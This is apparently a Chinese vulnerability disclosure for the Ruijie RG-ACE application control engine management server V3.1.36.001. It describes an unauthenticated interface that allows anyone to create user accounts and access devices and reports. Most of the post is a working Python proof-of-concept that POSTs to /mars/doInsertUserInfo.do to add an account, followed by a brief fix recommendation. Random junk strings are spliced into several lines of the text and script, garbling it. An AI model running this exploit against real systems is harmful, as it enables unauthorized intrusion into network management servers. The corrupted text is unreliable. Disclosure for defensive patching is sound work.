锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
2 S% c  f+ r/ z0 X/ M产品名称: 锐捷应用控制引擎
4 j. t( s5 F9 m9 u- t8 H9 }7 X版本号: 3.1.36.001 TC
0 r1 @6 b( [( D编译时间: 201104291730
6 ^6 U7 N7 m% l! s5 N- N  ?

漏洞证明：
7 w3 ^3 j- {6 x! ~


  v$ ~1 G* [- H. N0 {6 o

: v& d0 u6 Z- J, q- @: x" Q4 z* b
  _7 G; D: m4 M* c$ X7 E执行脚本
/ F; }7 N- }, E6 u  W" L$ }#! /usr/bin/env python
" K9 ^$ M0 m3 n8 K0 u9 c#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
2 y: Z  N' D; V$ r! T3 iopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
5 D+ D. L% c; W9 g. Ypost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
3 G" E8 G$ G% V, Y# G) b+ D("useropermanager","userManager"),
("userName","t"), #######账号自己加
" X1 q; m) D5 s4 X* q9 R% X  x7 c("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
  P. ]$ P3 U$ _0 S) A, t("officePhone",""),
0 H) o8 D, _5 k% a2 @("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
7 c" u! o1 n+ i( S* m, x+ m7 ^p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

登录，连接设备
' w4 }: g! @& E" o+ b8 \
* p" `: |  n( s/ Q



( H# d% [6 j0 m+ a7 g( a! M默认的管理员admin权限更大点



2 d5 h% [8 s" ?9 B+ E( Q3 g( f/ E; W

8 h* L8 f; q2 S. H4 S" Y' f修复方案：
加强对接口的权限验证

8 i% C9 z3 V1 s! I& h